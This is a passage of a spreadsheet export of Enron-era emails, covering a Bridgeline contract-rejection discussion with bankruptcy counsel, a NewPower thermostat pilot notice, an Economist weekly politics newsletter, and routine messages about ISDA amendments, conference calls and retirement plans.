    <t>Sat, 12 Jan 2002 09:49:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'&lt;ellenberg"."mark@enron.com&gt;'})</t>
  </si>
  <si>
    <t>RE: Bridgeline Transport and Storage</t>
  </si>
  <si>
    <t>This is good information.  One other thing that wasn't mentioned was the fact that all of the partnership documents are in the name of LRCI (and other wholly owned affiliates of ENA - but not ENA itself), while the storage and transport agreement is in the name of ENA [Gerald - I think this is right].  My guess is that this may further strengthen Mark's belief that the arrangements should not be linked._x000D_
 _x000D_
Based on Mark's conclusion - I would like to get together internally to figure out what should be done on the storage and transport agreement.  It might be in the best interest of the creditors to give Bridgeline a sense that we might be rejecting the agreement so that they can line something else up (thereby mitigating the harm to the partnership and indirectly to ENA as a 40% interest owner)._x000D_
 _x000D_
Stuart_x000D_
 _x000D_
_x000D_
-----Original Message----- _x000D_
From: "Mark Ellenberg" &lt;Mark.Ellenberg@cwt.com&gt;@ENRON [mailto:"Mark Ellenberg" &lt;Mark.Ellenberg@cwt.com&gt;@ENRON] _x000D_
Sent: Fri 1/11/2002 7:51 PM _x000D_
To: Nemec, Gerald _x000D_
Cc: Redmond, Brian; Zisman, Stuart _x000D_
Subject: Re: Bridgeline Transport and Storage_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
baed on what i read in your e-mail, these are distinct contracts that would_x000D_
_x000D_
be viewed in isolation for purposes of rejection.  bridgeline's position is_x000D_
_x000D_
at best creative and i would give it little to no chance of success._x000D_
_x000D_
_x000D_
_x000D_
                    "Nemec,_x000D_
_x000D_
                    Gerald"               To:     mark.ellenberg@cwt.com_x000D_
_x000D_
                    &lt;Gerald.Nemec@        cc:     "Zisman, Stuart" &lt;Stuart.Zisman@ENRON.com&gt;, "Redmond, Brian"_x000D_
_x000D_
                    ENRON.com&gt;            &lt;Brian.Redmond@ENRON.com&gt;_x000D_
_x000D_
                    Office:               Subject:     Bridgeline Transport and Storage_x000D_
_x000D_
                    01/11/02 07:27_x000D_
_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark,  In discussion with Bridgeline Holding LP's bankruptcy counsel today,_x000D_
_x000D_
he stated that he thought ENA would be unable to reject that storage and_x000D_
_x000D_
transport contracts with Bridgeline without ENA also rejecting the_x000D_
_x000D_
Partnership Agreement for Bridgeline.  What are your thoughts on this?_x000D_
_x000D_
Their counsel's argument was that these long term contracts were part of_x000D_
_x000D_
the consideration for TEPI to enter into the LP and as such ENA would not_x000D_
_x000D_
be able to escape the obligations of these contracts and still obtain the_x000D_
_x000D_
benefits of the LP._x000D_
_x000D_
Some background:_x000D_
_x000D_
Bridgeline Holdings, L.P. was formed in March of 2000 with ENA holding 40%_x000D_
_x000D_
equity and Texaco Exploration &amp; Production, Inc. holds the other 60%_x000D_
_x000D_
equity.  Management of the LP is 50/50.  ENA and TEPI both contributed_x000D_
_x000D_
natural gas pipeline assets located in Louisana into the Partnership.  ENA_x000D_
_x000D_
entered into a long term storage and transport agreement (the ones you have_x000D_
_x000D_
seen) at the time of the closing of this deal.  These agreements call for_x000D_
_x000D_
monthly demand charges.  There is also a letter agreement concerning early_x000D_
_x000D_
termination of the storage and transport agreements.    The letter states "_x000D_
_x000D_
You [ENA] acknowledge and agree that such termination fees are necessary to_x000D_
_x000D_
induce TEPI to enter into that certain Amended and Restated Limited_x000D_
_x000D_
Partnership Agreement".  The letter goes on to set out the specific LDs_x000D_
_x000D_
payable by ENA to TEPI upon their early termination._x000D_
_x000D_
You may need more facts than these.  Let me know if you need more info._x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
_x000D_
and may contain confidential and privileged material for the sole use of_x000D_
_x000D_
the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
_x000D_
others is strictly prohibited. If you are not the intended recipient (or_x000D_
_x000D_
authorized to receive for the recipient), please contact the sender or_x000D_
_x000D_
reply to Enron Corp. at enron.messaging.administration@enron.com and delete_x000D_
_x000D_
all copies of the message. This e-mail (and any attachments hereto) are not_x000D_
_x000D_
intended to be an offer (or an acceptance) and do not create or evidence a_x000D_
_x000D_
binding and enforceable contract between Enron Corp. (or any of its_x000D_
_x000D_
affiliates) and the intended recipient or any other party, and may not be_x000D_
_x000D_
relied on by anyone as the basis of a contract by estoppel or otherwise._x000D_
_x000D_
Thank you._x000D_
_x000D_
**********************************************************************_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
NOTE:  The information in this email is confidential and may be legally privileged.  If you are not the intended recipient, you must not read, use or disseminate the information.  Although this email and any attachments are believed to be free of any virus or other defect_x000D_
_x000D_
that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by Cadwalader, Wickersham_x000D_
_x000D_
&amp; Taft for any loss or damage arising in any way from its use._x000D_
_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
NOTE:  The information in this email is confidential and may be legally privileged.  If you are not the intended recipient, you must not read, use or disseminate the information.  Although this email and any attachments are believed to be free of any virus or other defect_x000D_
_x000D_
that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by Cadwalader, Wickersham_x000D_
_x000D_
&amp; Taft for any loss or damage arising in any way from its use._x000D_
_x000D_
_x000D_
==============================================================================</t>
  </si>
  <si>
    <t>Sun, 13 May 2001 12:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Remote control your air-conditioner and heater</t>
  </si>
  <si>
    <t>NewPower to offer another pilot program to Houston employees_x000D_
_x000D_
_x000D_
Free remote energy management solution helps you to manage rising energy _x000D_
bills._x000D_
NewPower is launching a revolutionary technology pilot to the first 500 _x000D_
people to sign up in the Houston area.  The NewPower Connections Remote _x000D_
Energy Management Solution is a pilot program designed to give consumers _x000D_
control of their thermostat via the Internet.  The program will allow _x000D_
thermostats to be adjusted from anywhere, with any Internet-enabled device, _x000D_
including computers, web-enabled cell phones, palm OS devices, or pocket _x000D_
PCs.  Sears Home Central will install and service the Remote Energy _x000D_
Management Solution at no charge throughout the duration of the pilot _x000D_
program.  For a typical household, the three-month pilot could result in up _x000D_
to 10 percent to 15 percent utility bill savings, based on personal usage and _x000D_
the size of your home.  _x000D_
_x000D_
_x000D_
Be among the first to participate absolutely free._x000D_
Enrollment with the NewPower Connections Remote Energy Management Solution _x000D_
pilot program starts May 14 and continues through the end of the month.  For _x000D_
more information about this offer, visit NewPower's table located in the _x000D_
Plaza of the Enron Building near the down escalator from 11:00 a.m. to 2 p.m. _x000D_
during the week of May 14.  To become a pilot participant you need only to be _x000D_
a homeowner in the Houston area and have Internet access.  You do not even _x000D_
have to be a NewPower electricity customer to participate.  For more _x000D_
information about NewPower Connections, send an e-mail to _x000D_
connections@newpower.com._x000D_
_x000D_
_x000D_
Disclaimers:_x000D_
Any contract for goods or services that is entered into by an Enron employee _x000D_
with respect to the NewPower program shall be solely between NewPower and _x000D_
such employee.  Enron assumes no obligation on behalf of NewPower and makes _x000D_
no representations, warranties, or guaranties with respect to NewPower, any _x000D_
goods or services offered or provided by NewPower.  Home.Enron.com</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 20:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'the_economist-politics-admin@lists.economist.com'})</t>
  </si>
  <si>
    <t>The world this week: Politics 16th - 22nd June 2001</t>
  </si>
  <si>
    <t>=09[IMAGE]_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
ADVANCED SEARCH_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
[IMAGE]_x000D_
=09[IMAGE]_x000D_
=09[IMAGE]_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Thursday June  21st 2001_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Subscribe | E-mail &amp; Mobile Editions | Screensaver_x000D_
=09_x000D_
=09[IMAGE]_x000D_
=09[IMAGE]_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
OPINION_x000D_
_x000D_
_x000D_
WORLD_x000D_
_x000D_
_x000D_
BUSINESS_x000D_
_x000D_
_x000D_
FINANCE_x000D_
_x000D_
_x000D_
SCIENCE_x000D_
_x000D_
_x000D_
PEOPLE_x000D_
_x000D_
_x000D_
BOOKS &amp; ARTS_x000D_
_x000D_
_x000D_
MARKETS_x000D_
_x000D_
_x000D_
DIVERSIONS_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
[IMAGE][IMAGE][IMAGE][IMAGE][IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE][IMAGE]_x000D_
[IMAGE] Economist.com Classifieds_x000D_
 =20_x000D_
 To find the best executive-level jobs, advanced educational courses and to=_x000D_
p=20_x000D_
business opportunities, click here=20_x000D_
_x000D_
    [IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PRINT EDITION_x000D_
THE ECONOMIST_x000D_
  [IMAGE]Full contents[IMAGE]Subscriptions_x000D_
 [IMAGE]_x000D_
=20_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Customer  service=20_x000D_
_x000D_
To continue to receive this newsletter please amending your details.  =20_x000D_
_x000D_
As a non-registered user of Economist.com you can stop receiving this=20_x000D_
newsletter, by sending an e-mail to and please tell us which newsletter you=_x000D_
=20_x000D_
wish to stop receiving: politics or business. Once a registered user of=20_x000D_
Economist.com, you can sign up for or cancel the text and HTML versions of=_x000D_
=20_x000D_
this newsletter or change your e-mail address by amending your details=20_x000D_
_x000D_
http://economist.com/_x000D_
members/email.cfm, log in and complete the form. =20_x000D_
_x000D_
To learn more about the benefits of registration click here=20_x000D_
registration page and fill out the  registration form.=20_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
 [IMAGE] [IMAGE]_x000D_
[IMAGE]=09[IMAGE]=09[IMAGE]=09[IMAGE]=09Politics this week_x000D_
=09=09=09=09June 21st 2001_x000D_
=09=09=09=09From The Economist print edition =20_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09Arms race revisited?_x000D_
=09=09=09=09_x000D_
=09=09=09=09Fresh from meeting George Bush and being told that the United S=_x000D_
tates would=20_x000D_
build its national missile defence scheme whether Russia liked it or not,=_x000D_
=20_x000D_
President Vladimir Putin said that, if so, his country would increase its=_x000D_
=20_x000D_
nuclear power =01&amp;many times over=018 by putting multiple warheads on its m=_x000D_
issiles._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: Doing the normal thing E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09A former foreign minister of France, Roland Dumas, found guilty=_x000D_
 of corruption=20_x000D_
in the Elf affair in President Fran?ois Mitterrand=01,s day, claimed two of=_x000D_
=20_x000D_
today=01,s ministers, including Hubert V,drine, the foreign minister, had k=_x000D_
nown=20_x000D_
full well what was going on._x000D_
=09=09=09=09_x000D_
=09=09=09=09The patchy truce between Israel and the Palestinians continued,=_x000D_
 though both=20_x000D_
sides blamed the other for not sticking to the bargain. Colin Powell, Ameri=_x000D_
ca=01,_x000D_
s secretary of state, will be returning to the region. Israel reacted angri=_x000D_
ly=20_x000D_
to a BBC documentary about the possibility that Ariel Sharon, Israel=01,s p=_x000D_
rime=20_x000D_
minister, might be charged with war crimes for his indirect responsibility=_x000D_
=20_x000D_
for the massacre of Palestinian refugees in 1982._x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09AP_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09After riots at the European Union=01,s summit and meeting with =_x000D_
George Bush in=20_x000D_
Sweden, the Italian city of Genoa prepared gloomily to hold a G8 summit in=_x000D_
=20_x000D_
July. Try a ship instead, suggested some._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: More tomatoes, please E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09Collateral damage_x000D_
=09=09=09=09_x000D_
=09=09=09=09Iraq claimed that 23 people had been killed when American and B=_x000D_
ritish=20_x000D_
aircraft patrolling Iraq=01,s northern no-fly zone bombed land near Mosul t=_x000D_
hat=20_x000D_
was used as a football pitch. The Americans and the British deny the=20_x000D_
incident.=20_x000D_
=09=09=09=09_x000D_
=09=09=09=09Police shot dead 13 people in India when a mob set fire to the =_x000D_
state assembly=20_x000D_
building in Imphal, the capital of Manipur. The rioters were protesting=20_x000D_
against the Delhi government=01,s truce with Naga separatists in the state._x000D_
=09=09=09=09_x000D_
=09=09=09=09Frustrating the Algerian regime=01,s divide-and-rule tactics, p=_x000D_
rotests that=20_x000D_
started in the Berber-speaking region spread to other areas._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: The swelling anger of Algerians E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09A bomb in an office of Bangladesh=01,s ruling Awami League kill=_x000D_
ed 22 people. It=20_x000D_
was the biggest of a series of blasts that have killed about 100 people in=_x000D_
=20_x000D_
the past two years. The opposition Bangladesh National Party denied=20_x000D_
involvement in the attack._x000D_
=09=09=09=09_x000D_
=09=09=09=09Patients are a virtue_x000D_
=09=09=09=09_x000D_
=09=09=09=09The United States Senate plunged into a dispute over a patients=_x000D_
=01, bill of=20_x000D_
rights. Arguing that it would raise health-care costs, Republicans delayed=_x000D_
=20_x000D_
action on the bill. The Democrats say they will keep the Senate in session=_x000D_
=20_x000D_
beyond its July 4th recess to pass it._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: Hillary, you won the war E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09NATO said that, if there were a peace deal in Macedonia, it wou=_x000D_
ld send up to=20_x000D_
5,000 troops empowered, among other things, to collect weapons surrendered =_x000D_
by=20_x000D_
ethnic-Albanian guerrillas._x000D_
=09=09=09=09_x000D_
=09=09=09=09An appeal court in California upheld a homeless man=01,s 25-yea=_x000D_
r prison sentence=20_x000D_
for stealing four biscuits. The man, jailed under California=01,s =01&amp;three=_x000D_
 strikes=20_x000D_
and you=01,re out=018 policy, was said by the court to be a career criminal=_x000D_
._x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09Reuters_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09Prosecutors agreed to charge Spain=01,s foreign minister, Josep=_x000D_
 Pique, over=20_x000D_
alleged frauds in a sale to Elf by Ercros, a Spanish firm of which he was=_x000D_
=20_x000D_
once a director. The attorney-general can overturn the decision._x000D_
=09=09=09=09_x000D_
=09=09=09=09Eight days after dispatching Timothy McVeigh, the United States=_x000D_
 carried out=20_x000D_
its second federal execution. Unlike McVeigh, Juan Raul Garza, a drug=20_x000D_
trafficker and murderer, had apologised for his crimes._x000D_
=09=09=09=09_x000D_
=09=09=09=09The United States Justice Department said it would try to settl=_x000D_
e a=20_x000D_
long-running civil lawsuit against the tobacco industry that was filed in=_x000D_
=20_x000D_
1999 in an attempt to recover billions of dollars spent on tobacco-related=_x000D_
=20_x000D_
illnesses._x000D_
=09=09=09=09_x000D_
=09=09=09=09Popular king_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09Reuters_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09In Bulgaria=01,s general election, a movement headed by ex-King=_x000D_
 Simeon II won=20_x000D_
half of the 240 seats in parliament. An ethnic-Turkish party said it was=20_x000D_
ready to join a coalition. It is unclear whether Simeon will become prime=_x000D_
=20_x000D_
minister, seek the presidency in the autumn or call the shots from behind t=_x000D_
he=20_x000D_
scenes._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: Is democracy working? E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09After Tony Blair=01,s post-electoral reshaping of Britain=01,s =_x000D_
administration, his=20_x000D_
chancellor of the exchequer (finance minister), Gordon Brown, announced new=_x000D_
=20_x000D_
measures to bash cartels, encourage entrepreneurs and speed up land-use=20_x000D_
planning decisions. No, the relevant ministries have not been abolished._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: The man who would make you rich E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09A vote of no confidence ended the long Christian Democrat domin=_x000D_
ation of=20_x000D_
Berlin=01,s city government. A Social Democrat-Green coalition will run Ber=_x000D_
lin=20_x000D_
until a fresh election is held, probably in September._x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09AP_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09General Pervez Musharraf, who seized power from Pakistan=01,s e=_x000D_
lected government=20_x000D_
in October 1999, had himself sworn in as president. One motive, it was=20_x000D_
thought, was to give him additional stature for his meeting with the Indian=_x000D_
=20_x000D_
prime minister on July 14th._x000D_
=09=09=09=09_x000D_
=09=09=09=09See article: Prez Pervez E+_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09_x000D_
=09=09=09=09World business on trial._x000D_
=09=09=09=09_x000D_
=09=09=09=09Visit Economist.com's Business section and get authoritative in=_x000D_
sights on the=20_x000D_
latest in the mobile-phone industry, E-strategy briefs from Merrill Lynch,=_x000D_
=20_x000D_
Siemens, etc., the EU's workers' rights and much more. Also be sure to visi=_x000D_
t=20_x000D_
the Business this week section to stay informed on the week's key events. F=_x000D_
or=20_x000D_
concise global business reports click here.=20_x000D_
=09=09=09=09_x000D_
=09=09=09=09[IMAGE]_x000D_
=09=09=09=09_x000D_
=09=09=09=09SEARCH_x000D_
=09=09=09=09_x000D_
=09=09=09=09The EconomistEconomist.comGlobal LibraryThe webThe EIU Advanced=_x000D_
 search_x000D_
=09=09=09=09_x000D_
=09=09=09=09[IMAGE]_x000D_
=09=09=09=09=09[IMAGE]=09[IMAGE]_x000D_
=09=09=09=09=09[IMAGE]=09[IMAGE]_x000D_
=09=09=09=09 [IMAGE] =09[IMAGE]=09[IMAGE]_x000D_
=09=09=09=09=09=09[IMAGE]_x000D_
=09=09=09=09=09=09_x000D_
=09=09=09=09=09=09GO TO ECONOMIST.COM_x000D_
=09=09=09=09=09=09 , Copyright 2001 The Economist Newspaper and The Economi=_x000D_
st Group. All rights=20_x000D_
reserved._x000D_
=09=09=09=09=09=09Legal disclaimer | Privacy Policy | Terms &amp; Conditions=20_x000D_
=09=09=09=09=09=09[IMAGE]_x000D_
=09=09=09=09=09=09[IMAGE]_x000D_
=09=09=09=09=09=09_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 09:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rbw@mrwassoc.com', 'jmball@ns.net', 'kent.palmerton@williams.com', 'jackp@calpine.com', 'dkk@eslawfirm.com', 'rwhyde@duke-energy.com', 'andybrwn@earthlink.net', 'paula.hall-collins@williams.com', 'kgough@calpine.com', 'abb@eslawfirm.com', 'lale@dynegy.com', 'smara@enron.com', 'kvellandi@pstrategies.com', 'kaplan@iepa.com', 'smutny@iepa.com', 'john_h_stout@reliantenergy.com', 'kedson@ns.net', 'gtbl@dynegy.com', 'knorton@mcnallytemple.com', 'rmcnally@mcnallytemple.com', 'tross@mcnallytemple.com', 'rllamkin@seiworldwide.com', 'cabaker@duke-energy.com', 'jeff.dasovich@enron.com', 'stephanie-newell@reliantenergy.com', 'joer@calpine.com', 'curtis_l_kebler@reliantenergy.com', 'mwilson@pstrategies.com'})</t>
  </si>
  <si>
    <t>IEP PR Report 12/12</t>
  </si>
  <si>
    <t>Attached is the PR Report for our weekly conference call._x000D_
_x000D_
Please call with questions._x000D_
_x000D_
Thanks,_x000D_
Jean_x000D_
916-447-8186_x000D_
_x000D_
 - 12.pdf</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 01:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ena.nominations@enron.com'})</t>
  </si>
  <si>
    <t>12/14 Noms</t>
  </si>
  <si>
    <t xml:space="preserve">55% from storage_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 02:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mmo@blakes.com', 'mtuohey@velaw.com', 'peter.keohane@enron.com', 'awm@blakes.com', 'mark.haedicke@enron.com', 'dpef@blakes.com', 'rek@blakes.com', 'gfl@blakes.com', 'rob.milnthorp@enron.com', 'richard.shapiro@enron.com', 'jeffrey.hodge@enron.com', 'dwm@blakes.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Project Stanley Conference Call</t>
  </si>
  <si>
    <t>Please be advised that there will be a conference call regarding the _x000D_
above-referenced matter on Friday, August 25th at 10:30 a.m. central time._x000D_
_x000D_
The dial in number and pincode remains the same:  1-800-998-2462     pincode _x000D_
4309724_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 08:55:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ken.lewchuk@enron.com'})</t>
  </si>
  <si>
    <t>Load Profiles - San Diego Gas &amp; Electric</t>
  </si>
  <si>
    <t>Chris,_x000D_
_x000D_
We require 2000 load profiles for SDG&amp;E.  Unlike the other utilities, SDG&amp;E does not have 2000 LPs loaded on their web-site.  Do you know of a contact at who may be able to help us?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ken</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa@casa-de-clarke.com'})</t>
  </si>
  <si>
    <t>Memory Mail (#77821201)</t>
  </si>
  <si>
    <t xml:space="preserve">Have you checked this out?_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/06/2001 08:56 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
memories@classmates.com@cmates.com on 03/06/2001 06:18:37 AM_x000D_
Sent by: bounce+OM_1721158593@cmates.com_x000D_
To: kay.mann@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Memory Mail (#77821201)_x000D_
_x000D_
Hi, Kay._x000D_
_x000D_
There's great news for you over at ClassMates.com!_x000D_
_x000D_
You've asked us to keep track of your fellow _x000D_
Southwest classmates. The following _x000D_
are recent additions to your school:_x000D_
_x000D_
1 person found from the class of 1961_x000D_
1 person found from the class of 1965_x000D_
2 people found from the class of 1969_x000D_
3 people found from the class of 1970_x000D_
3 people found from the class of 1971_x000D_
3 people found from the class of 1972_x000D_
5 people found from the class of 1973_x000D_
1 person found from the class of 1974_x000D_
1 person found from the class of 1975_x000D_
6 people found from the class of 1976_x000D_
3 people found from the class of 1977_x000D_
3 people found from the class of 1978_x000D_
2 people found from the class of 1979_x000D_
2 people found from the class of 1980_x000D_
2 people found from the class of 1981_x000D_
4 people found from the class of 1982_x000D_
2 people found from the class of 1983_x000D_
2 people found from the class of 1984_x000D_
1 person found from the class of 1985_x000D_
2 people found from the class of 1986_x000D_
1 person found from the class of 1987_x000D_
2 people found from the class of 1988_x000D_
3 people found from the class of 1989_x000D_
3 people found from the class of 1990_x000D_
6 people found from the class of 1991_x000D_
3 people found from the class of 1992_x000D_
2 people found from the class of 1993_x000D_
1 person found from the class of 1994_x000D_
6 people found from the class of 1995_x000D_
2 people found from the class of 1996_x000D_
8 people found from the class of 1998_x000D_
1 person found from the class of 1999_x000D_
3 people found from the class of 2000_x000D_
1 person found from the class of 2001_x000D_
1 person found from the class of 2002_x000D_
1 person found from the class of 2003_x000D_
_x000D_
http://www.classmates.com/go/e/77821201/MM105/MM01_x000D_
_x000D_
Some things get better with age. Are you one of them? Why _x000D_
not show off your improvements with a paid membership? _x000D_
Upgrade your access to ClassMates.com for US$29.50 and get _x000D_
in touch with the old gang._x000D_
_x000D_
http://www.classmates.com/go/e/77821201/MM105/MM04_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
All of us at ClassMates.com_x000D_
Delivering thousands of memories a day._x000D_
_x000D_
We hope you enjoyed receiving this message; if you would _x000D_
rather not receive this notice, please update your _x000D_
preferences on our email subscription page._x000D_
_x000D_
http://www.classmates.com/go/e/77821201/MM105/MM03_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Jan 2000 08:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marilyn.colbert@enron.com', 'nidia.mendoza@enron.com', 'yolanda.cordova-gilbert@enron.com', 'brent.hendry@enron.com', 'william.bradford@enron.com', 'tanya.rohauer@enron.com', 'susan.bailey@enron.com', 'molly.harris@enron.com', 'willie.harrell@enron.com', 'mary.gosnell@enron.com', 'connie.sutton@enron.com', 'rod.nelson@enron.com', 'russell.diamond@enron.com', 'mary.solmonson@enron.com', 'brant.reves@enron.com', 'patricia.cini@enron.com', 'diane.ellstrom@enron.com', 'laurel.adams@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'david.dupre@enron.com', 'jefferson.sorenson@enron.com', 'dale.neuner@enron.com', 'dianne.seib@enron.com', 'mark.taylor@enron.com', 'melba.lozano@enron.com', 'anthony.campos@enron.com', 'bill.hare@enron.com', 'sara.shackleton@enron.com', 'shari.stack@enron.com', 'susan.flynn@enron.com', 'john.suttle@enron.com', 'lesli.campbell@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'samuel.schott@enron.com', 'pamela.sonnier@enron.com', 'marie.heard@enron.com', 'lynn.shivers@enron.com', 'tracy.ngo@enron.com', 'carol.clair@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'bernice.rodriguez@enron.com', 'chris.walker@enron.com'})</t>
  </si>
  <si>
    <t>Canadian Imperial Bank of Commerce</t>
  </si>
  <si>
    <t>We have received the executed Amendment to ISDA Master Agreement between ENA _x000D_
and the referenced Counterparty dated January 13, 2000.  This Amendment _x000D_
amends the Threshold levels in the Credit Support Annex.  Copies will be _x000D_
distributed.</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 09:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ISDA Master Documentation Workshop</t>
  </si>
  <si>
    <t xml:space="preserve">Euromoney stopped doing their great seminar a few years back.  We have not _x000D_
yet found any other seminar that equals it.  I'll keep my eyes posted, _x000D_
though.  _x000D_
_x000D_
_x000D_
_x000D_
	Alan Aronowitz_x000D_
	10/25/2000 04:16 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ISDA Master Documentation Workshop_x000D_
_x000D_
Are either of you aware of any master documentation workshops being offered _x000D_
in NYC or London in the next few months that would be worthwhile for Jane _x000D_
McBride to attend?  I remember several years ago going to a program that _x000D_
Euromoney (or Eurocurrency) put on for 2-days focusing on ISDA's. _x000D_
_x000D_
Please advise. Thanks._x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 02:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EWEB's comments to the Credit Support Annex</t>
  </si>
  <si>
    <t>Holli:_x000D_
_x000D_
I have still not received the above-mentioned comments.  I have also not _x000D_
received EWEB's proposed form of legal opinion.  I will go ahead and _x000D_
blackline the Schedule once again._x000D_
_x000D_
When the lawyers last spoke, we agreed to execute all docs prior to the end _x000D_
of the year._x000D_
_x000D_
Would you please call EWEB and inquire about these items?_x000D_
_x000D_
Thanks.  Sara</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 01:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Savings Plan v. 401K</t>
  </si>
  <si>
    <t xml:space="preserve">Kate - _x000D_
_x000D_
401K and the cash balance retirement plan are 2 separate plans.  You are _x000D_
automatically enrolled in the cash balance plan - you would be eligible to _x000D_
participate for the year 2000.  Going forward, at the end of each year, Enron _x000D_
will set aside 5% of your salary into an account (Enron directs these _x000D_
funds).  This account has a 5 year vesting period meaning that you must stay _x000D_
with the company for 5 years to be eligible to receive these funds when you _x000D_
leave. _x000D_
_x000D_
Does this help?_x000D_
_x000D_
Amy_x000D_
_x000D_
_x000D_
   Kate Symes                01/16/2001 09:34 AM_x000D_
_x000D_
To: Amy FitzPatrick/PDX/ECT@ECT_x000D_
cc:  _x000D_
